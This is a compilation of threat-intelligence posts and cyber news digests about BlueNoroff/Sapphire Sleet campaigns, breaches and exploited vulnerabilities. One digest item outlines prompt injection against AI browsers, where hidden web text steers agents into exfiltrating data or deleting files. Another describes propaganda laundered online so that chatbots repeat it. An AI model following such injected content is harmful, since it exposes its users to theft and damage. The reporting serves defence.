📢 Attaque supply chain npm Mastra AI attribuée au groupe nord-coréen Sapphire Sleet
📝 ## 🎯 Contexte

Source : BleepingComputer, publié le 20 juin 2026.
📖 cyberveille : https://cyberveille.ch/posts/2026-06-22-attaque-supply-chain-npm-mastra-ai-attribuee-au-groupe-nord-coreen-sapphire-sleet/
🌐 source : https://www.bleepingcomputer.com/news/security/microsoft-links-mastra-ai-supply-chain-attack-to-north-korean-hackers/
#BlueNoroff #IOC #Cyberveille

Sapphire Sleet Targets macOS

We recently observed a multi-stage macOS intrusion campaign conducted by the North Korean state-sponsored threat group Sapphire Sleet (also tracked as BlueNoroff / UNC1069). The campaign specifically targets macOS environments within high-value financial sectors, including venture capital firms, Web3 developers, and cryptocurrency organizations. By leveraging signed, built-in system applications like the Apple Script Editor and Finder, the malware operates outside traditional macOS security enforcement boundaries, suppresses system security alerts, and executes arbitrary code directly under the guise of an authentic user update. This aligns with broader public reporting on macOS-focused intrusion tradecraft. Initial access relied on targeted social engineering in which victims were instructed to execute a fake Zoom SDK update component, leading to user-assisted execution and follow-on payload delivery.

Pulse ID: 6a19675cc4b620f11791ba1b
Pulse Link: https://otx.alienvault.com/pulse/6a19675cc4b620f11791ba1b
Pulse Author: AlienVault
Created: 2026-05-29 10:15:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlueNoroff #CyberSecurity #InfoSec #Korea #Mac #MacOS #Malware #NorthKorea #OTX #OpenThreatExchange #RAT #RCE #SocialEngineering #Web3 #Zoom #bot #cryptocurrency #developers #AlienVault

📢 BlueNoroff cible le secteur Web3 via de fausses réunions Zoom, ClickFix et deepfakes IA
📝 ## 🔍 Contexte

Arctic Wolf Labs publie le 27 avr...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-bluenoroff-cible-le-secteur-web3-via-de-fausses-reunions-zoom-clickfix-et-deepfakes-ia/
🌐 source : https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/
#Adobe_Premiere_Pro #BlueNoroff #Cyberveille

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/logitech-confirms-data-breach-after-clop-extortion-attack/

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | https://thehackernews.com/2025/11/rondodox-exploits-unpatched-xwiki.html

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger [email protected][.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | https://thehackernews.com/2025/11/five-us-citizens-plead-guilty-to.html

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got updates on nation-state breaches, some nasty new malware, critical vulnerabilities under active exploitation, and some significant discussions around AI and data privacy. Let's dive in:

F5 Nation-State Breach Update 🛡️
- F5 has provided an update on the nation-state attack disclosed on 15 October, confirming the attacker had prolonged access to their systems.
- The incident led to emergency updates for BIG-IP software/hardware and the theft of some customer configuration data and 44 undisclosed vulnerabilities.
- F5 claims the impact on customers was "limited" and the exfiltrated data "not sensitive," while also boosting security with CrowdStrike EDR for BIG-IP and an enhanced bug bounty program.
🤫 CyberScoop | https://cyberscoop.com/f5-attack-limited-impact-earnings-call/

Gmail "Breach" Reports Debunked 📧
- Reports circulating about a "massive Gmail breach" affecting 183 million accounts have been clarified as false by Google.
- The confusion stemmed from a misunderstanding of aggregated infostealer logs, which contain old, recycled credentials, not evidence of a new Gmail intrusion.
- Google reiterates its strong defences and active monitoring, prompting password resets for affected users when old credentials resurface.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/gmail_breach_fake_news/

SideWinder APT Evolves Attack Chain 🐍
- The SideWinder APT group is targeting South Asian diplomats with a new infection chain using malicious PDFs and ClickOnce applications.
- Spear-phishing emails deliver malware like ModuleInstaller and StealerBot, designed for extensive data collection including screenshots, keystrokes, and passwords.
- Attackers employ sophisticated evasion techniques, including legitimate signed executables, region-locked C2 communications, and dynamic payload paths.
👾 The Hacker News | https://thehackernews.com/2025/10/sidewinder-adopts-new-clickonce-based.html

BlueNoroff's GhostCall & GhostHire Campaigns 👻
- North Korean-linked BlueNoroff (Lazarus Group sub-cluster) is actively targeting Web3 and blockchain sectors with new campaigns: GhostCall and GhostHire.
- GhostCall uses fake Zoom/Microsoft Teams calls to deploy macOS malware, while GhostHire lures Web3 developers with booby-trapped GitHub job assessment projects.
- These campaigns deploy a range of sophisticated malware (e.g., DownTroy, CosmicDoor, RooTroy) to harvest credentials and sensitive data from development environments, cloud platforms (AWS, Google Cloud, Azure), and communication tools, with generative AI reportedly accelerating malware development.
👾 The Hacker News | https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html

Herodotus Android Malware Mimics Humans 🤖
- A new Android banking trojan, Herodotus, has been discovered, capable of full device control to steal from banking and crypto apps.
- Its unique evasion technique involves mimicking human typing with random pauses when inputting stolen credentials or transaction details, making automated detection harder.
- Observed in active campaigns in Italy and Brazil, disguising itself as legitimate banking security apps, highlighting the need for advanced fraud controls beyond simple keystroke analysis.
🗞️ The Record | https://therecord.media/android-malware-mimics-humans-avoid-detection

WSUS RCE Under Active Exploitation 🚨
- A critical RCE vulnerability, CVE-2025-59287, in Windows Server Update Services (WSUS) is under active exploitation by a new threat actor, UNC6512.
- This unauthenticated deserialization flaw affects Windows Server 2012-2025, allowing arbitrary code execution on exposed WSUS instances.
- Microsoft's initial patch was incomplete, leading to emergency updates, and telemetry shows widespread exploitation attempts, with attackers focusing on initial access and internal reconnaissance.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/27/microsoft_wsus_attacks_multiple_orgs/

AI Browsers Vulnerable to Prompt Injection 🧠
- New AI browsers like OpenAI's Atlas, Comet, and Fellou are highly susceptible to prompt injection, both direct and indirect, and cross-site request forgery.
- Attackers can manipulate web content (e.g., hidden text, malicious URLs) to inject commands, leading to data exfiltration, malicious actions (like deleting files), or poisoning the AI's memory.
- Security experts consider prompt injection an "unsolved security problem" inherent to LLMs, urging vendors to implement low privileges, human consent, vetted sources, and robust output controls.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/ai_browsers_prompt_injection/
🤫 CyberScoop | https://cyberscoop.com/openai-atlas-splx-research-cloaking-attacks-browser-agents/

Chatbots Parrot Russian Propaganda 🇷🇺
- A study by the Institute for Strategic Dialogue (ISD) found popular chatbots (ChatGPT, Gemini, Grok, DeepSeek) cited Russian state-attributed sources in up to 25% of answers about the Ukraine war.
- This "LLM grooming" technique involves miscreants laundering state media talking points online to influence AI models, with biased or malicious prompts increasing the likelihood of pro-Kremlin content.
- Google's Gemini performed best by implementing safety guardrails, but the findings raise serious concerns about AI's role in disinformation and the enforceability of sanctions on state-backed media.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/chatbots_still_parrot_russian_state/

Human Cost of MoD Afghan Data Breach 💔
- New research submitted to the UK Parliament reveals the devastating human toll of the Ministry of Defence's 2022 Afghan relocation scheme data breach.
- The leak directly led to threats, violent assaults, and even the deaths of family members and colleagues for 49 of the 231 affected individuals, with 87% reporting other personal risks.
- The report highlights severe mental health impacts and calls for urgent government action, including expedited relocations and redress for all affected Afghans.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/impact_afghan_data_breach/

Clearview AI Faces Criminal Charges in EU ⚖️
- Privacy advocacy group Noyb has filed a criminal complaint against Clearview AI in Austria for repeatedly ignoring over $100 million in EU GDPR fines.
- Clearview AI's practice of scraping social media images for facial recognition without consent has been deemed illegal across Europe, but the company has largely evaded enforcement.
- The complaint leverages Article 84 of GDPR, which allows criminal proceedings against managers of organisations flouting data protection laws, aiming to set a precedent for cross-border enforcement.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2025/10/28/noyb_criminal_charges_clearview/

US Declines UN Cybercrime Treaty 🌐
- The United States notably declined to sign the landmark UN Convention against Cybercrime, which was signed by over 70 countries including the UK, EU, China, and Russia.
- The treaty aims to create a global mechanism for coordinating against digital crime, facilitating electronic evidence sharing, and criminalising internet-dependent offenses.
- The US State Department is "reviewing" the treaty, which has faced criticism from the tech industry and human rights groups over concerns it could criminalise cybersecurity research and enable broad surveillance by authoritarian regimes.
🗞️ The Record | https://therecord.media/us-declines-signing-cybercrime-treaty

NYPD Surveillance System Lawsuit 👁️
- The Surveillance Technology Oversight Project (STOP) is suing the NYPD, alleging its Domain Awareness System (DAS) is unconstitutional.
- DAS, a partnership with Microsoft since 2012, integrates citywide cameras, biometrics, digital communication monitors, and data analytics to track and profile New Yorkers.
- The lawsuit argues DAS violates constitutional rights to freedom of speech and protection from unreasonable searches, with newly obtained records showing its extensive data aggregation capabilities accessible to all NYPD officers.
🗞️ The Record | https://therecord.media/nypd-domain-awareness-system-civil-rights-lawsuit

#CyberSecurity #ThreatIntelligence #Vulnerabilities #RCE #WSUS #APT #SideWinder #BlueNoroff #Malware #AndroidMalware #PromptInjection #AIDisinformation #DataPrivacy #GDPR #CybercrimeTreaty #Surveillance #InfoSec #IncidentResponse

🚨 BlueNoroff APT launches GhostCall & GhostHire campaigns targeting Web3 & VC sectors.
🎭 Fake Zoom calls & GitHub assessments → multi-stage macOS + Windows malware.
💰 Steals crypto wallets, API keys, and cloud data.

Full report:
https://www.technadu.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire-target-web3-venture-capital-sectors-via-advanced-social-engineering/612075/

#CyberSecurity #APT #BlueNoroff #Web3Security #TechNadu